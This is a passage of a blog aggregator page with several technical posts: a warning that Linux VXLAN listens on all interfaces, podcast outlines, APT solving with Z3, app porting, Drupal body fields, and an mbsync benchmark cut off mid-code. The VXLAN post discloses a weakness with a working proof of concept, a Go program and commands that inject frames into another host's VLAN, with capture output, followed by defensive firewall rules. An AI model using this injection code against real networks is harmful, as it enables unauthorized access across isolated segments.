FLOSS Project Planets

Paul Tagliamonte: Be careful when using vxlan!

Planet Debian - Sun, 2021-11-21 21:39

I’ve spent a bit of time playing with vxlan - which is very neat, but also incredibly insecure by default.

When using vxlan, be very careful to understand how the host is connected to the internet. The kernel will listen on all interfaces for VXLAN packets, which means a host reachable by the VMs it’s hosting (e.g., over a bridged interface or a private LAN) will accept packets from those VMs and inject them into arbitrary VLANs, even ones the sender is not on.

I reported this, with more technical details, to the kernel mailing list, but got no reply.

The tl;dr is:

$ ip link add vevx0a type veth peer name vevx0z
$ ip addr add 169.254.0.2/31 dev vevx0a
$ ip addr add 169.254.0.3/31 dev vevx0z
$ ip link add vxlan0 type vxlan id 42 \
    local 169.254.0.2 dev vevx0a dstport 4789
$ # Note the above 'dev' and 'local' ip are set here
$ ip addr add 10.10.10.1/24 dev vxlan0

results in vxlan0 listening on all interfaces, not just vevx0z or vevx0a. To prove it to myself, I spun up a docker container (using a completely different network bridge – with no connection to any of the interfaces above), and ran a Go program to send VXLAN UDP packets to my bridge host:

$ docker run -it --rm -v $(pwd):/mnt debian:unstable /mnt/spam 172.17.0.1:4789
$

which results in packets getting injected into my vxlan interface

$ sudo tcpdump -e -i vxlan0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on vxlan0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
21:30:15.746754 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746773 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746787 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746801 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746815 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746827 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746870 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746885 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746899 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
21:30:15.746913 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114
10 packets captured
10 packets received by filter
0 packets dropped by kernel

(the program in question is the following:)

package main

import (
	"net"
	"os"

	"github.com/mdlayher/ethernet"
	"github.com/mdlayher/vxlan"
)

func main() {
	conn, err := net.Dial("udp", os.Args[1])
	if err != nil {
		panic(err)
	}

	for i := 0; i < 10; i++ {
		vxf := &vxlan.Frame{
			VNI: vxlan.VNI(42),
			Ethernet: &ethernet.Frame{
				Source:      net.HardwareAddr{0xDE, 0xAD, 0xBE, 0xEF, 0x00, 0x01},
				Destination: net.HardwareAddr{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
				EtherType:   ethernet.EtherTypeIPv4,
				Payload:     []byte("Hello, World!"),
			},
		}

		frb, err := vxf.MarshalBinary()
		if err != nil {
			panic(err)
		}

		_, err = conn.Write(frb)
		if err != nil {
			panic(err)
		}
	}
}

When using vxlan, be absolutely sure that all hosts able to address any interface on the host are authorized to send arbitrary packets into any VLAN that box can send to, or that very careful and specific controls and firewalling are in place. Note this includes public interfaces (e.g., dual-homed private network / internet boxes), or any other type of dual-homing (VPNs, etc).
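As one concrete (and entirely hypothetical) way to implement such firewalling, the host could restrict the VXLAN UDP port to the intended underlay peer. This sketch uses nftables and reuses the interface and address names from the example above; it is not from the original report, so adjust table, interface, and peer address for a real setup:

```sh
# Hypothetical nftables rules (a sketch, not from the original post):
# accept VXLAN traffic (UDP 4789) only from the expected underlay peer
# on the expected interface, and drop it on every other interface.
nft add table inet filter
nft add chain inet filter input '{ type filter hook input priority 0; policy accept; }'
nft add rule inet filter input iifname "vevx0a" ip saddr 169.254.0.3 udp dport 4789 accept
nft add rule inet filter input udp dport 4789 drop
```

This does not make the default behavior safe, but it at least stops arbitrary hosts (like the Docker container above) from reaching the VXLAN socket.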

Categories: FLOSS Project Planets

Podcast.__init__: Declarative Deep Learning From Your Laptop To Production With Ludwig and Horovod

Planet Python - Sun, 2021-11-21 21:36
Deep learning frameworks encourage you to focus on the structure of your model ahead of the data that you are working with. Ludwig is a tool that uses a data oriented approach to building and training deep learning models so that you can experiment faster based on the information that you actually have, rather than spending all of your time manipulating features to make them match your inputs. In this episode Travis Addair explains how Ludwig is designed to improve the adoption of deep learning for more companies and a wider range of users. He also explains how the Horovod framework plugs in easily to allow for scaling your training workflow from your laptop out to a massive cluster of servers and GPUs. The combination of these tools allows for a declarative workflow that starts off easy but gives you full control over the end result.


Announcements
  • Hello and welcome to Podcast.__init__, the podcast about Python’s role in data and science.
  • When you’re ready to launch your next app or want to try a project you hear about on the show, you’ll need somewhere to deploy it, so take a look at our friends over at Linode. With the launch of their managed Kubernetes platform it’s easy to get started with the next generation of deployment and scaling, powered by the battle tested Linode platform, including simple pricing, node balancers, 40Gbit networking, dedicated CPU and GPU instances, and worldwide data centers. Go to pythonpodcast.com/linode and get a $100 credit to try out a Kubernetes cluster of your own. And don’t forget to thank them for their continued support of this show!
  • Your host as usual is Tobias Macey and today I’m interviewing Travis Addair about building and training machine learning models with Ludwig and Horovod
Interview
  • Introductions
  • How did you get introduced to Python?
  • Can you describe what Horovod and Ludwig are?
    • How do the projects work together?
  • What was your path to being involved in those projects and what is your current role?
  • There are a number of AutoML libraries available for frameworks such as scikit-learn, etc. What are the challenges that are introduced by applying that workflow to deep learning architectures?
  • What are the use cases that Ludwig is designed to enable?
  • Who are the target users of Ludwig?
    • How do the workflows change/progress for the different personas?
  • How is the underlying framework architected?
    • What are the available extension points to provide a progressive exposure of complexity?
    • How have the goals and design of the project changed or evolved as it has gained more widespread adoption beyond Uber?
      • What was the motivation for migrating the core of Ludwig from TensorFlow to PyTorch?
  • Can you describe the workflow of building a model definition with Ludwig?
    • How much knowledge of neural network architectures and their relevant characteristics is necessary to use Ludwig effectively?
  • What are the motivating factors for adding Horovod to the process?
    • What is involved in moving from a single machine/single process training loop to a multi-core or multi-machine distributed training process?
  • The combination of Ludwig and Horovod provide a shallower learning curve for building and scaling model training. What do you see as their potential impact on the availability and adoption of more sophisticated ML capabilities across organizations of varying scale?
    • What do you see as other significant barriers to widespread use of ML functionality?
  • What are the most interesting, innovative, or unexpected ways that you have seen Ludwig and/or Horovod used?
  • What are the most interesting, unexpected, or challenging lessons that you have learned while working on Ludwig and Horovod?
  • When is Ludwig and/or Horovod the wrong choice?
  • What do you have planned for the future of both projects?
Keep In Touch

Picks

Closing Announcements
  • Thank you for listening! Don’t forget to check out our other show, the Data Engineering Podcast for the latest on modern data management.
  • Visit the site to subscribe to the show, sign up for the mailing list, and read the show notes.
  • If you’ve learned something or tried out a project from the show then tell us about it! Email hosts@podcastinit.com with your story.
  • To help other people find the show please leave a review on iTunes and tell your friends and co-workers
Links

The intro and outro music is from Requiem for a Fish The Freak Fandango Orchestra / CC BY-SA

Categories: FLOSS Project Planets

Podcast.__init__: Build Better Analytics And Models With A Focus On The Data Experience

Planet Python - Sun, 2021-11-21 21:06
A lot of time and energy goes into data analysis and machine learning projects to address various goals. Most of the effort is focused on the technical aspects and validating the results, but how much time do you spend considering the experience of the people who are using the outputs of these projects? In this episode Benn Stancil explores the impact that our technical focus has on the perceived value of our work, and how taking the time to consider what the desired experience will be can lead us to approach our work more holistically and increase the satisfaction of everyone involved.


Announcements
  • Hello and welcome to Podcast.__init__, the podcast about Python’s role in data and science.
  • When you’re ready to launch your next app or want to try a project you hear about on the show, you’ll need somewhere to deploy it, so take a look at our friends over at Linode. With the launch of their managed Kubernetes platform it’s easy to get started with the next generation of deployment and scaling, powered by the battle tested Linode platform, including simple pricing, node balancers, 40Gbit networking, dedicated CPU and GPU instances, and worldwide data centers. Go to pythonpodcast.com/linode and get a $100 credit to try out a Kubernetes cluster of your own. And don’t forget to thank them for their continued support of this show!
  • Your host as usual is Tobias Macey and today I’m interviewing Benn Stancil about the perennial frustrations of working with data and thoughts on how to improve the experience
Interview
  • Introductions
  • How did you get introduced to Python?
  • Can you start by discussing your perspective on the most frustrating elements of working with data in an organization?
    • How might that compound when working with machine learning?
  • What are the sources of the disconnect between our level of technical sophistication and our ability to produce meaningful insights from our data?
  • There have been a number of formulations about a "hierarchy of needs" pertaining to data. When the goal is to bring ML/AI methods to bear on an organization’s processes or products how can thinking about the intended experience act to improve the end result?
    • What are some failure modes or suboptimal outcomes that might be expected when building from a tooling/technology/technique first mindset?
  • What are some of the design elements that we can incorporate into our development environments/data infrastructure/data modeling that can incentivize a more experience driven process for building data products/analyses/ML models?
  • How does the design and capabilities of the Mode platform allow teams to progress along the journey from data discovery to descriptive analytics, to ML experiments?
  • What are the most interesting, innovative, or unexpected approaches that you have seen for encouraging the creation of positive data experiences?
  • What are the most interesting, unexpected, or challenging lessons that you have learned while working on Mode and data analysis?
  • When is a data experience the wrong approach?
  • What do you have planned for the future of Mode to support this ideal?
Keep In Touch

Picks

Links

The intro and outro music is from Requiem for a Fish The Freak Fandango Orchestra / CC BY-SA

Categories: FLOSS Project Planets

Julian Andres Klode: APT Z3 Solver Basics

Planet Debian - Sun, 2021-11-21 14:49

Z3 is a theorem prover developed at Microsoft Research and available as a dynamically linked C++ library in Debian-based distributions. While the library is a whopping 16 MB, and the solver is a tad slow, its permissive licensing and the number of tactics offered give it huge potential for use in solving dependencies in a wide variety of applications.

Z3 does not need normalized formulas; it offers higher-level abstractions like atmost, atleast, and implies, which we will use together with boolean variables to translate the dependency problem into a form Z3 understands.

In this post, we’ll see how we can apply Z3 to the dependency resolution in APT. We’ll only discuss the basics here, a future post will explore optimization criteria and recommends.

Translating the universe

APT’s package universe consists of 3 relevant things: packages (the tuple of name and architecture), versions (basically a .deb), and dependencies between versions.

While we could translate our entire universe to Z3 problems, we instead will construct a root set from packages that were manually installed and versions marked for installation, and then build the transitive root set from it by translating all versions reachable from the root set.

For each package P in the transitive root set, we create a boolean literal P. We then translate each version P1, P2, and so on. Translating a version means building a boolean literal for it, e.g. P1, and then translating the dependencies as shown below.

We now need to create two more clauses to satisfy the basic requirements for debs:

  1. If a version is installed, the package is installed; and vice versa. We can encode this requirement for P above as P == atleast({P1,P2}, 1).
  2. There can only be one version installed. We add an additional constraint of the form atmost({P1,P2}, 1).

We also encode the requirements of the operation.

  1. For each package P that is manually installed, add a constraint P.
  2. For each version V that is marked for install, add a constraint V.
  3. For each package P that is marked for removal, add a constraint !P.
Dependencies

Packages in APT have dependencies of two basic forms: Depends and Conflicts, as well as variations like Breaks (identical to Conflicts in solving terms), and Recommends (soft Depends) - we’ll ignore those for now. We’ll discuss Conflicts in the next section.

Let’s take a basic dependency list: A Depends: X|Y, Z. To represent that dependency, we expand each name to a list of versions that can satisfy the dependency, for example X1|X2|Y1, Z1.

Translating this dependency list to our Z3 solver, we create boolean variables X1,X2,Y1,Z1 and define two rules:

  1. A implies atleast({X1,X2,Y1}, 1)
  2. A implies atleast({Z1}, 1)

If there actually was nothing that satisfied the Z requirement, we’d have added a rule not A. It would be possible to simply not tell Z3 about the version at all as an optimization, but that adds more complexity, and the not A constraint should not cause too many problems.

Conflicts

Conflicts cannot have or in them. A dependency B Conflicts: X, Y means that only one of B, X, and Y can be installed. We can directly encode this in Z3 by using the constraint atmost({B,X,Y}, 1). This is an optimized encoding of the constraint: we could have encoded each conflict in the form !B or !X, !B or !Y, and so on. Usually this leads to worse performance as it introduces additional clauses.
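To convince ourselves the two encodings agree, here is a quick brute-force check in plain Python (ordinary booleans rather than the actual Z3 API): the single atmost-1 constraint is equivalent to the conjunction of all pairwise "not both" clauses.

```python
from itertools import product

def atmost(bits, k):
    """True iff at most k of the given booleans are set."""
    return sum(bits) <= k

# Check all 8 assignments of (B, X, Y).
for b, x, y in product([False, True], repeat=3):
    # Optimized encoding: atmost({B, X, Y}, 1)
    optimized = atmost((b, x, y), 1)
    # Clause encoding: (!B or !X) and (!B or !Y) and (!X or !Y)
    pairwise = (not b or not x) and (not b or not y) and (not x or not y)
    assert optimized == pairwise
print("encodings agree on all assignments")
```

Three clauses for three literals is manageable, but the pairwise encoding grows quadratically with the number of literals, which is why a native atmost constraint tends to perform better.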

Complete example

Let’s assume we start with an empty install and want to install the package a below.

Package: a
Version: 1
Depends: c | b

Package: b
Version: 1

Package: b
Version: 2
Conflicts: x

Package: d
Version: 1

Package: x
Version: 1

The translation in Z3 rules looks like this:

  1. Package rules for a:
    1. a == atleast({a1}, 1) - package is installed iff one version is
    2. atmost({a1}, 1) - only one version may be installed
    3. a – a must be installed
  2. Dependency rules for a
    1. implies(a1, atleast({b2, b1}, 1)) – the translated dependency above. note that c is gone, it’s not reachable.
  3. Package rules for b:
    1. b == atleast({b1,b2}, 1) - package is installed iff one version is
    2. atmost({b1, b2}, 1) - only one version may be installed
  4. Dependencies for b (= 2):
    1. atmost({b2, x1}, 1) - the conflicts between x and b = 2 above
  5. Package rules for x:
    1. x == atleast({x1}, 1) - package is installed iff one version is
    2. atmost({x1}, 1) - only one version may be installed

The package d is not translated, as it is not reachable from the root set {a1}, the transitive root set is {a1,b1,b2,x1}.
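The translated problem above is small enough to check by brute force. The following plain-Python sketch (not the actual Z3 bindings, and not APT's real solver code) enumerates all assignments of the literals and keeps those satisfying every rule listed above:

```python
from itertools import product

def atleast(bits, k): return sum(bits) >= k
def atmost(bits, k):  return sum(bits) <= k
def implies(p, q):    return (not p) or q

solutions = []
# Literals: packages a, b, x and versions a1, b1, b2, x1
for a, a1, b, b1, b2, x, x1 in product([False, True], repeat=7):
    rules = [
        a == atleast((a1,), 1),             # a installed iff one of its versions is
        atmost((a1,), 1),                   # at most one version of a
        a,                                  # a must be installed
        implies(a1, atleast((b2, b1), 1)),  # dependency of a1 (c is unreachable)
        b == atleast((b1, b2), 1),          # b installed iff one of its versions is
        atmost((b1, b2), 1),                # at most one version of b
        atmost((b2, x1), 1),                # conflict between b (= 2) and x
        x == atleast((x1,), 1),             # x installed iff its version is
        atmost((x1,), 1),                   # at most one version of x
    ]
    if all(rules):
        solutions.append({'a1': a1, 'b1': b1, 'b2': b2, 'x1': x1})

# Every solution installs a1 and exactly one version of b.
for s in solutions:
    assert s['a1'] and (s['b1'] != s['b2'])
print(len(solutions), "satisfying assignments")
# → 3: {a1, b1}, {a1, b1, x1}, and {a1, b2}
```

This also makes the need for optimization obvious: the rules admit three models (including one that needlessly installs x), and plain SAT gives no way to prefer the smallest one.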

Next iteration: Optimization

We have now constructed the basic set of rules that allows us to solve our dependency problems (equivalent to SAT); however, it might lead to suboptimal solutions where it removes automatically installed packages, or installs more packages than necessary, to name a few examples.

In our next iteration, we have to look at introducing optimization criteria; for example, the minimum number of removals, the minimal number of changed packages, or satisfying as many recommends as possible. We will also look at the upgrade problem (upgrade as many packages as possible) and the autoremove problem (remove as many automatically installed packages as possible).

Categories: FLOSS Project Planets

Porting Tok To Not Linux: The Journey Of Incessant Failure

Planet KDE - Sun, 2021-11-21 14:32

This response from a reader pretty much sums it up:

Stop One: Will Craft Work?

Craft seems like the no-brainer for a KDE project to use, considering it's in-house and supports all of KDE's frameworks and has packaging capabilities. Unfortunately, what sounds good on paper does not translate to what's good in execution.

When I first checked it out, the current version being shipped had incorrect code that would have failed to compile had it been a compiled language instead of Python. Heck, even running a typechecker for Python would have revealed the fact that the code was trying to call a function that didn't exist. Yet, this managed to get shipped. Not a good first impression.

After manually patching the function into existence on my system, I ran into another hurdle: Craft's env script is broken, mangling PATH to the point where entries like /usr/bin and /bin just got truncated into oblivion, resulting in a shell where you couldn't do much of anything.

After manually patching PATH to be not mangled, I ran into another and the final hurdle before I gave up: Craft tried to use half bundled libraries and tools and half system libraries and tools, resulting in dynamic linker errors from system tools not finding symbols they needed from bundled libraries.

When I brought these issues up in the Craft chat, the answers basically amounted to a lack of care and “go use Ubuntu.” Not acceptable for Tok considering most of the people interested in building Tok like this don't use Ubuntu, and honestly doesn't make you have much faith in a system for porting utilities to other platforms if said system doesn't even work across the distributions of one platform.

Stop Two: Maybe Conan?

Conan seems like the second-in-line no-brainer for Tok to use. It's the largest C++ package manager, even supporting Qbs. Of course, like with Craft, what sounds good on paper doesn't match up to execution.

Out of the gate, I looked at the Qt package, only to find that there was one (1) Qt package for it consisting of the entirety of Qt, WebEngine and all. Kinda oof, but not a deal breaker. Well, it wouldn't be a dealbreaker if Conan had prebuilt Qt packages for

- Settings: arch=x86_64, build_type=Release, compiler=gcc, compiler.version=11, os=Linux

But it doesn't. I'm not going to build an entire web engine just for an attempt at maybe getting a non-Linux build of Tok, and having to build a web engine as part of Tok's CI is a no-go in terms of disk, memory and CPU.

Stop Three: vcpkg

Considering Microsoft has been a developer tools company for about thrice as long as I've been alive, I hoped their take on the C++ package manager thing would be worth its salt.

Some weirdness ensued with the VCPKG_ROOT environment variable at first, but it was easy to fix by pointing it at the vcpkg repo.

While doing the vcpkg install, I found the output somewhat hard to follow, so I had no idea how far along it was. I just let it sit since it seemed to be making progress.

While vcpkg didn't have prebuilt binaries for my setup, it didn't require building all Qt modules like Conan did, so the ask was much more reasonable.

And then I noticed a big issue: vcpkg has absolutely zero versioning, other than the git repository with all the package manifests. This essentially means that in order to build with Qt5, I need to commit to an ancient version of vcpkg packages and stay there indefinitely. I also have to ask users to roll back their vcpkg install that far to build Tok. Not really acceptable as an ask for people who might want to build Tok for not Linux.

Stop Four: Wait, It's Already Here (At Least For Macs)

Turns out Nix, the thing that Tok already supports building with, also supports macOS. Well, that was easy. While it doesn't spit out a premade .app like other porting systems can do, it does ensure a working build with available dependencies, which is already most of the way there.

Conclusion: Apples And Penguins Rule, Everyone Else Drools

Cross-platform C++ packaging and distribution is still a very unsolved problem, unlike other languages/frameworks like Go, Electron, Rust, Zig, etc. as I learned painfully through these escapades. Nix seems the most promising on this front, as it offers a very consistent environment across platforms, which gets you most of the way there in terms of building. It doesn't support Windows (yet?), but simply being able to use a functional compiler instead of Apple Clang is already a killer feature for using it to port apps to macOS.

Qbs is also a huge help in terms of the porting process, as it natively supports building things that require auxiliary scripts or build system hacks with other build systems, like .app bundles, Windows installers, and multi-architecture .app/.aab/.apks with just a few or no extra lines in the build system.

For Tok on macOS, all I need to do is add these two lines to the build script in order to get a usable .app file from it:

Depends { name: "bundle" }
bundle.isBundle: true

While it lacks a lot of metadata that you need to fill in yourself, it's again, another 99% of the way there solution where the remaining 1% is mostly just a little data or boilerplate or running a tool.

I still haven't figured out what I'll be doing for Windows, but the need for an end-user Windows package is still a long ways off, considering Tok is still nowhere near a 1.0 release status. Perhaps I can leverage Fedora's mingw packages or check out https://mxe.cc/, or maybe just install dependencies from source to a Windows system without a package manager, and bundle them during the build process. If you have any suggestions, do feel free to hop on by in the Tok chat and drop them.

Tags: #libre

Categories: FLOSS Project Planets

#! code: Drupal 9: Removing The Summary From The Body Field

Planet Drupal - Sun, 2021-11-21 13:31

I'm not a fan of the summary option on body fields in Drupal. I've never really got on with how users interact with it or the content it produces.

The field type I'm talking about is called "Text (formatted, long, with summary)" and it appears as an add-on summary field to a normal content editor area. It comes as standard on Drupal installs and appears on all body fields. The field type has its uses, but I often find that the content it produces is unpredictable and doesn't offer a great editing experience. I have even written articles in the past about swapping the summary field to a fully fledged wysiwyg area for Drupal 7, which worked on the project I implemented it on.

Let's look at the body summary field in Drupal and see why I have a few problems with it.

The Body Summary

If you create a new content type in Drupal you will automatically get a body field. This field will always be of the type "Text (formatted, long, with summary)" and will have a machine name of "body". This is unlike most other fields in Drupal, which get a prefix of "field_" in the field machine name. You can also create your own fields of the same type as the default body field.

The field footprint looks like this in the field management page of the content type.

When editing or creating a page of content the body field is shown like this.

Read more.

Categories: FLOSS Project Planets

Anarcat: mbsync vs OfflineIMAP

Planet Python - Sun, 2021-11-21 11:04

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options but I figured I would start with a popular one (mbsync).

But I also evaluated OfflineIMAP which was resurrected from the Python 2 apocalypse, and because I had used it before, for a long time.

Read on for the details.

Benchmark setup

All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye.

The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive.

The server is a custom build with a AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C).

The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:

$ notmuch count --exclude=false
372758
$ du -sh --exclude xapian Maildir
13G	Maildir

The baseline we are comparing against is SMD (syncmaildir) which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely.

Anything close to that or better is good enough. I do not have recent numbers for a SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline.

A baseline for a full sync might also be set with rsync, which copies files at nearly 40MB/s, or 317Mb/s!

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/
 12,647,814,731 100%   37.85MB/s    0:05:18 (xfr#394981, to-chk=0/395815)
72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k
8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps

That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/
              0   0%    0.00kB/s    0:00:00 (xfr#0, to-chk=0/395815)
1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k
120inputs+0outputs (3major+12709minor)pagefaults 0swaps

As an extra curiosity, here's the performance with tar, pretty similar with rsync, minus incremental which I cannot be bothered to figure out right now:

anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/ | pv -s 13G | tar xf -
56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k
0inputs+0outputs (0major+7266minor)pagefaults 0swaps
12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%

Interesting that rsync manages to almost beat a plain tar on file transfer, I'm actually surprised by how well it performs here, considering there are many little files to transfer.

(But then again, this maybe is exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?)

Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves much faster transfer rate on disks:

anarcat@marcos:~$ tar fc - Maildir | pv -s 13G > Maildir.tar
15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%

That's 131 mebibytes per second, vastly faster than the gigabit link. The client has similar performance:

anarcat@angela:~(main)$ tar fc - Maildir | pv -s 17G > Maildir.tar
16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%

So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. Which begs the question of what is blocking performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyways.

Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It show SMD to be faster than OfflineIMAP, but not as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync

The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirrors, message flags, full folder support, and "trash" functionality.

Complex configuration file

I started with this .mbsyncrc configuration file:

SyncState *
Sync New ReNew Flags

IMAPAccount anarcat
Host imap.anarc.at
User anarcat
PassCmd "pass imap.anarc.at"
SSLType IMAPS
CertificateFile /etc/ssl/certs/ca-certificates.crt

IMAPStore anarcat-remote
Account anarcat

MaildirStore anarcat-local
# Maildir/top/sub/sub
#SubFolders Verbatim
# Maildir/.top.sub.sub
SubFolders Maildir++
# Maildir/top/.sub/.sub
# SubFolders legacy
# The trailing "/" is important
#Path ~/Maildir-mbsync/
Inbox ~/Maildir-mbsync/

Channel anarcat
# AKA Far, convert when all clients are 1.4+
Master :anarcat-remote:
# AKA Near
Slave :anarcat-local:
# Exclude everything under the internal [Gmail] folder, except the interesting folders
#Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
# Or include everything
Patterns *
# Automatically create missing mailboxes, both locally and on the server
#Create Both
Create slave
# Sync the movement of messages between folders and deletions, add after making sure the sync works
#Expunge Both

Long gone are the days when I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of an "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian package ships one in /usr/share/doc/isync/examples/mbsyncrc.sample but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax.

Also, that syntax is a little overly complicated. For example, Far needs colons, like:

Far :anarcat-remote:

Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global.

Using a more standard format like .INI or TOML could improve that situation.

Stellar performance

A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive.

It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync.
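For the record, here is how that back-of-the-envelope number works out (a quick sketch, assuming decimal gigabytes):

```python
# Sanity check on the quoted rate: 12 GB transferred in 56 minutes and 6 seconds.
size_bits = 12 * 1000**3 * 8   # 12 GB in bits, assuming decimal (SI) gigabytes
duration_s = 56 * 60 + 6
mbps = size_bits / duration_s / 1e6
print(round(mbps, 1))  # roughly 28.5 Mbit/s, consistent with the ~29Mbit/s above
```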

The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:

===> multitime results
1: mbsync -a
        Mean        Std.Dev.    Min         Median      Max
real    2.015       0.052       1.930       2.029       2.105
user    0.660       0.040       0.592       0.661       0.722
sys     0.338       0.033       0.268       0.341       0.387

Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m.

Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:

120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k
29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps

That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:

===> multitime results
1: mbsync -a
        Mean        Std.Dev.    Min         Median      Max
real    2.500       0.087       2.340      2.491       2.629
user    0.718       0.037       0.679      0.711       0.793
sys     0.322       0.024       0.284      0.320       0.365

Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There mbsync is worse than the SMD baseline:

===> multitime results
1: mbsync -a
        Mean        Std.Dev.    Min         Median      Max
real    31.531      0.724       30.764     31.271      33.100
user    1.858       0.125       1.721      1.818       2.131
sys     0.610       0.063       0.506      0.600       0.695

That's 30 seconds for a sync, which is an order of magnitude slower than SMD.

Great user interface

Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:

anarcat@angela:~(main)$ mbsync -a
Notice: Master/Slave are deprecated; use Far/Near instead.
C: 1/2 B: 204/205 F: +0/0 *0/0 #0/0 N: +1/200 *0/0 #0/0

(Note that nice switch away from slavery-related terms too.)

The display is minimal, and yet informative. It's not obvious what it all means at first glance, but the manpage is useful at least for clarifying that:

This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).

In other words:

  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted

You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary of mail traffic in the logs.
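That compact format does parse mechanically, which could be one way of getting a summary into the logs. A hedged Python sketch of such a parser (a hypothetical helper, not part of mbsync; the line format is assumed from the example and manpage excerpt above):

```python
import re

def parse_progress(line: str) -> dict:
    """Parse an mbsync progress line into done/total pairs per counter."""
    out = {}
    # channel (C) and mailbox (B) counters: "C: 1/2"
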